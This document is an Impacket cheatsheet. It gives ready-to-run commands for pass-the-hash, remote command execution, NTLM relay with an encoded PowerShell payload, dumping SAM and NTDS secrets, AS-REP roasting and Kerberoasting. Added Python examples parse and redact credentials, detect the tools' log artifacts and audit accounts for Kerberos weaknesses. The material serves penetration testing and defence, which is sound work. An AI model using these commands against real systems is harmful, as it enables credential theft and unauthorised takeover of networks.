Impacket Cheatsheet
Collection of Python tools for working with network protocols (SMB, MSRPC, etc.).
Authentication Format
All tools use the same authentication format:
[[domain/]username[:password]@]<target>
Examples:
administrator:Password123@10.10.10.10
DOMAIN/admin:Password123@10.10.10.10
admin@10.10.10.10 (prompts for password)
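The target format above is shared by every tool, so a small parser for it is useful when reviewing recorded command lines (for instance, process-creation events that captured an Impacket invocation) and when logging such command lines without the password. The following Python is an added example written for this cheatsheet; it is not Impacket's own `parse_target` code, and the regex and the `redact_spec` helper are this example's own. It assumes the first `:` after the username starts the password and that the password contains no `@` (this parser rejects such specs).

```python
import re
from typing import NamedTuple, Optional


class TargetSpec(NamedTuple):
    domain: str               # '' when no DOMAIN/ prefix was given
    username: str             # '' when no credentials were given at all
    password: Optional[str]   # None means the tool would prompt for it
    target: str               # hostname or IP address


# Regex written for this example to match [[domain/]username[:password]@]<target>.
# The first ':' after the username starts the password and the following '@'
# separates credentials from the target, so a password may contain ':' but not '@'.
_SPEC_RE = re.compile(
    r'^(?:(?:(?P<domain>[^/:@]*)/)?(?P<user>[^/:@]+)(?::(?P<pw>[^@]*))?@)?(?P<target>[^/@]+)$'
)


def parse_target_spec(spec: str) -> TargetSpec:
    """Split an Impacket-style target string into domain, user, password and target."""
    m = _SPEC_RE.match(spec)
    if m is None:
        raise ValueError(f'unrecognised target spec: {spec!r}')
    return TargetSpec(
        domain=m.group('domain') or '',
        username=m.group('user') or '',
        password=m.group('pw'),          # stays None when ':password' was omitted
        target=m.group('target'),
    )


def redact_spec(spec: str) -> str:
    """Return the spec with the password replaced by '***', so a captured
    command line can be logged or shared without the credential."""
    parsed = parse_target_spec(spec)
    if parsed.password is None:
        return spec
    prefix = f'{parsed.domain}/' if parsed.domain else ''
    return f'{prefix}{parsed.username}:***@{parsed.target}'


if __name__ == '__main__':
    for s in ('administrator:Password123@10.10.10.10',
              'DOMAIN/admin:Password123@10.10.10.10',
              'admin@10.10.10.10'):
        print(parse_target_spec(s), '->', redact_spec(s))
```

A bare target with no credentials (`dc01.domain.local`) parses to an empty username and `password=None`, which is the case where the tools prompt.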
Pass-the-Hash
Use -hashes with format LMHASH:NTHASH:
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10
impacket-psexec
Remote command execution using RemComSvc.
Interactive Shell
impacket-psexec administrator:'Password123'@10.10.10.10
Execute Command
impacket-psexec administrator:'Password123'@10.10.10.10 'whoami'
Domain Account
impacket-psexec DOMAIN/admin:'Password123'@10.10.10.10
Pass-the-Hash
impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10
impacket-smbexec
Similar to psexec but doesn't upload a binary. Uses a local SMB server for output.
Interactive Shell
impacket-smbexec administrator:'Password123'@10.10.10.10
With Share
impacket-smbexec -share ADMIN$ administrator:'Password123'@10.10.10.10
impacket-atexec
Execute commands via Task Scheduler service.
Execute Command
impacket-atexec administrator:'Password123'@10.10.10.10 'whoami'
Pass-the-Hash
impacket-atexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10 'ipconfig'
impacket-wmiexec
Execute commands via WMI.
Interactive Shell
impacket-wmiexec administrator:'Password123'@10.10.10.10
Execute Command
impacket-wmiexec administrator:'Password123'@10.10.10.10 'whoami'
impacket-dcomexec
Execute commands via DCOM.
impacket-dcomexec administrator:'Password123'@10.10.10.10
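Each of the execution tools above leaves a characteristic host artifact: psexec installs the RemComSvc service (a System log event 7045), smbexec installs a service whose image path is a `cmd.exe` one-liner, wmiexec spawns `cmd.exe` under `WmiPrvSE.exe`, and atexec registers a scheduled task; all of them, by default, redirect command output into a file on a loopback administrative share. The detection logic below is an added example for defenders, not code from the page or from Impacket. The log lines are constructed in a simple `Key=value` shape (not real Windows event text), and the string indicators are the defaults of Impacket's example scripts as I know them (an assumption; an operator can change them, so treat these as tripwires rather than a complete detection).

```python
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    tool: str
    reason: str
    line: str


def parse_kv(line: str) -> Dict[str, str]:
    """Parse a constructed 'Key=value Key2="value with spaces"' log line."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


# Loopback UNC path to an administrative share: the default place where
# wmiexec/smbexec/atexec collect command output on the target itself.
_LOOPBACK_SHARE = re.compile(r'\\\\127\.0\.0\.1\\(ADMIN|C)\$\\', re.I)
# atexec's default output file for the task it creates (assumed default).
_ATEXEC_TMP = re.compile(r'%windir%\\Temp\\\w+\.tmp', re.I)


def detect(lines: List[str]) -> List[Finding]:
    """Return one finding per line that matches an Impacket-style execution artifact."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_kv(line)
        eid = ev.get('EventID', '')
        cmd = ev.get('CommandLine', '')
        image = ev.get('ImagePath', '')
        parent = ev.get('ParentProcessName', '').lower()
        if eid == '7045' and ev.get('ServiceName', '').lower() == 'remcomsvc':
            findings.append(Finding('psexec', 'RemComSvc service installed', line))
        elif eid == '7045' and '%COMSPEC%' in image.upper() and '__output' in image:
            findings.append(Finding('smbexec', 'service ImagePath runs cmd.exe with __output redirection', line))
        elif eid == '4688' and parent.endswith('wmiprvse.exe') and _LOOPBACK_SHARE.search(cmd):
            findings.append(Finding('wmiexec', 'cmd.exe spawned by WmiPrvSE.exe writing to a loopback share', line))
        elif eid == '4698' and _ATEXEC_TMP.search(ev.get('TaskContent', '')):
            findings.append(Finding('atexec', 'scheduled task writing output to %windir%\\Temp\\*.tmp', line))
        elif _LOOPBACK_SHARE.search(cmd) or _LOOPBACK_SHARE.search(image):
            findings.append(Finding('loopback-share', 'output redirected to a loopback administrative share', line))
    return findings


# Constructed sample events (service name, file names and timestamps are made up).
SAMPLE_LOG = [
    r'EventID=7045 ServiceName=RemComSvc ImagePath="%SystemRoot%\RANDOM12.exe"',
    r'EventID=7045 ServiceName=SVCNAME ImagePath="%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"',
    r'EventID=4688 NewProcessName=C:\Windows\System32\cmd.exe ParentProcessName=C:\Windows\System32\wbem\WmiPrvSE.exe CommandLine="cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"',
    r'EventID=4698 TaskName=\AbCdEfGh TaskContent="cmd.exe /C ipconfig > %windir%\Temp\AbCdEfGh.tmp 2>&1"',
    r'EventID=4688 NewProcessName=C:\Windows\System32\cmd.exe ParentProcessName=C:\Windows\explorer.exe CommandLine="cmd.exe /c dir"',
    r'EventID=7045 ServiceName=Spooler ImagePath="%SystemRoot%\System32\spoolsv.exe"',
    r'EventID=4688 NewProcessName=C:\Windows\System32\cmd.exe ParentProcessName=C:\Windows\System32\svchost.exe CommandLine="cmd.exe /c whoami > \\127.0.0.1\C$\out.txt"',
]


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print(f'{f.tool:15} {f.reason}')
```

The two benign lines (an interactive `cmd.exe /c dir` and the Spooler service) produce no finding; the last line shows the generic loopback-share rule catching a command that none of the tool-specific rules recognise.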
impacket-ntlmrelayx
NTLM relay attack tool.
Basic Relay (Dump SAM)
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10
Relay with Command Execution
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10 -c 'powershell -e <BASE64>'
Relay to Multiple Targets
impacket-ntlmrelayx --no-http-server -smb2support -tf targets.txt
Options
| Option | Description |
|---|---|
| -t TARGET | Single target |
| -tf FILE | Targets file |
| -smb2support | Enable SMB2 support |
| --no-http-server | Disable HTTP server |
| -c CMD | Command to execute |
| -e FILE | Execute file |
| -w | Watch for incoming connections |
| --remove-mic | Remove MIC (CVE-2019-1040) |
impacket-secretsdump
Dump secrets from SAM, LSA, and NTDS.dit.
Local SAM Dump
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Remote Dump
impacket-secretsdump administrator:'Password123'@10.10.10.10
Dump NTDS (Domain Controller)
impacket-secretsdump -just-dc administrator:'Password123'@dc01.domain.local
Just NTLM Hashes
impacket-secretsdump -just-dc-ntlm administrator:'Password123'@dc01.domain.local
impacket-smbclient
SMB client similar to smbclient.
impacket-smbclient administrator:'Password123'@10.10.10.10
Commands: shares, use, ls, cd, get, put, cat
impacket-smbserver
Create a local SMB server.
Basic Server
impacket-smbserver share /path/to/share
With SMB2 Support
impacket-smbserver share /path/to/share -smb2support
With Authentication
impacket-smbserver share /path/to/share -username user -password pass
impacket-GetNPUsers
AS-REP roasting: get TGTs for users with “Do not require Kerberos preauthentication” set.
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10
impacket-GetUserSPNs
Kerberoasting: get service tickets for cracking.
impacket-GetUserSPNs DOMAIN/user:'Password123' -dc-ip 10.10.10.10 -request
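Both checks above select accounts by directory attributes: AS-REP roasting needs the `DONT_REQ_PREAUTH` bit (0x400000) in `userAccountControl`, and Kerberoasting needs a user account with a `servicePrincipalName`. A defender can run the same selection from their own directory tooling to find what to fix. The Python below is an added example, not code from the page or from Impacket: it audits constructed account records, skips disabled, machine and `krbtgt` accounts, flags SPN-bearing accounts that are also protected by AdminSDHolder (`adminCount=1`) as the highest priority, and carries the equivalent LDAP filters (the OID `1.2.840.113556.1.4.803` is the bitwise-AND matching rule). The record shape and the remediation text are this example's own.

```python
from typing import Dict, Iterable, List, NamedTuple

# userAccountControl bits (standard Active Directory values).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # decimal 4194304

# LDAP filters selecting the same populations, for use from your own directory
# tooling. Disabled accounts are excluded in both.
ASREP_FILTER = ('(&(objectCategory=person)(objectClass=user)'
                '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
                '(!(userAccountControl:1.2.840.113556.1.4.803:=2)))')
SPN_FILTER = ('(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)'
              '(!(sAMAccountName=krbtgt))'
              '(!(userAccountControl:1.2.840.113556.1.4.803:=2)))')


class AccountRecord(NamedTuple):
    sam_account_name: str
    user_account_control: int
    service_principal_names: List[str]
    admin_count: int          # 1 when AdminSDHolder protects the account


def audit_kerberos_exposure(records: Iterable[AccountRecord]) -> Dict[str, List[str]]:
    """Group accounts by the Kerberos weakness they expose."""
    report: Dict[str, List[str]] = {'asrep_roastable': [], 'kerberoastable': [], 'kerberoastable_privileged': []}
    for r in records:
        if r.user_account_control & UF_ACCOUNTDISABLE:
            continue                       # disabled accounts get no tickets
        if r.user_account_control & UF_DONT_REQUIRE_PREAUTH:
            report['asrep_roastable'].append(r.sam_account_name)
        is_machine = r.sam_account_name.endswith('$')   # random 120-char passwords, not crackable
        if r.service_principal_names and not is_machine and r.sam_account_name.lower() != 'krbtgt':
            report['kerberoastable'].append(r.sam_account_name)
            if r.admin_count:
                report['kerberoastable_privileged'].append(r.sam_account_name)
    return report


REMEDIATION = {
    'asrep_roastable': 'clear "Do not require Kerberos preauthentication" on the account',
    'kerberoastable': 'set a long random password or migrate to a group managed service account (gMSA)',
    'kerberoastable_privileged': 'remove the SPN from the privileged account or move the service to an unprivileged account',
}

# Constructed sample records; names and SPNs are made up.
SAMPLE_RECORDS = [
    AccountRecord('alice', 0x200, [], 0),
    AccountRecord('legacy_app', 0x200 | UF_DONT_REQUIRE_PREAUTH, [], 0),
    AccountRecord('svc_sql', 0x200, ['MSSQLSvc/sql01.domain.local:1433'], 0),
    AccountRecord('svc_backup', 0x200, ['backup/srv01.domain.local'], 1),
    AccountRecord('old_svc', 0x200 | UF_ACCOUNTDISABLE, ['http/old01.domain.local'], 0),
    AccountRecord('SRV01$', 0x1000, ['HOST/srv01.domain.local'], 0),
    AccountRecord('krbtgt', 0x200 | UF_ACCOUNTDISABLE, ['kadmin/changepw'], 1),
]

if __name__ == '__main__':
    for category, names in audit_kerberos_exposure(SAMPLE_RECORDS).items():
        for name in names:
            print(f'{name:12} {category:26} -> {REMEDIATION[category]}')
```

The `kerberoastable_privileged` list is the one to clear first: an SPN on an account with `adminCount=1` means a crackable ticket is issued for a privileged identity.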
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes |
| -no-pass | Don't ask for password |
| -k | Use Kerberos authentication |
| -dc-ip IP | Domain controller IP |
| -target-ip IP | Target IP (if hostname used) |
| -debug | Enable debug output |